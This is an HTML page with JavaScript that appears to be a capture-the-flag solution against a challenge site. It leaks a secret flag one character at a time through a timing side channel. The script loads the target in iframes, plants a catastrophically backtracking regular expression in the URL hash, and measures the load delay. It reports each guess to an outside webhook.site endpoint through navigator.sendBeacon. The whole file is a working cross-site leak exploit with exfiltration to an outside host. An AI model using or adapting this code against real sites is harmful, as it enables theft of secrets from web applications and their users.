time_frame_base_redos_xss.html

<body>
</body>
<script>
async function sleep(ms = 0) {
    return new Promise(r => setTimeout(r, ms));
}
navigator.sendBeacon("https://webhook.site/ebf8aa6a-e1af-40da-98bc-c8c64d920b0b","start");
var delay_iframe;
var date_time0;
var date_time1;
var flag = (new URL(location.href)).searchParams.get('flag');
var candidate = "abcdefghijklmnopqrstuvwxyz_}";

async function ini(c){
    date_time0 = Date.now();
    delay_iframe = document.createElement('iframe');
    document.body.appendChild(delay_iframe); 
    delay_iframe.src="https://computeration-fixed.web.jctf.pro/";
    return new Promise(resolve => { 
        delay_iframe.onload = async () => {
            await test(c);
            resolve();
        }  //need to wait iframee to load and then modify the hash
    })
}

async function test(c){
    delay_iframe.src=`https://computeration-fixed.web.jctf.pro/#^(?=${flag+c}).*.*.*.*.*.*.*.*!$`;
    let iframee2 = document.createElement('iframe');
    iframee2.src="https://computeration-fixed.web.jctf.pro";
    document.body.appendChild(iframee2);
    return new Promise(resolve => { 
        let timeout = setTimeout(()=>{
            date_time1 = Date.now();
            iframee2?.remove();
            delay_iframe.remove();
            resolve();
            return;
        },4000);

        iframee2.onload = () => {
            date_time1 = Date.now();
            iframee2?.remove();
            clearTimeout(timeout);
            delay_iframe?.remove();
            resolve();
            return;
        }
    });
}
async function start(){
    while(1){
        navigator.sendBeacon("https://webhook.site/ebf8aa6a-e1af-40da-98bc-c8c64d920b0b",flag);
        console.log(flag);
        for (let c of candidate){
            navigator.sendBeacon("https://webhook.site/ebf8aa6a-e1af-40da-98bc-c8c64d920b0b",c);
            await ini(c);
            navigator.sendBeacon("https://webhook.site/ebf8aa6a-e1af-40da-98bc-c8c64d920b0b",c);
            let time_change = date_time1-date_time0;
            console.log(time_change);
            if(time_change>3000){
                flag += c;
                delay_iframe.remove();
                location.href = location.origin+location.pathname+"?flag="+flag;
                break;
            }
        }
    }
}
start();
</script>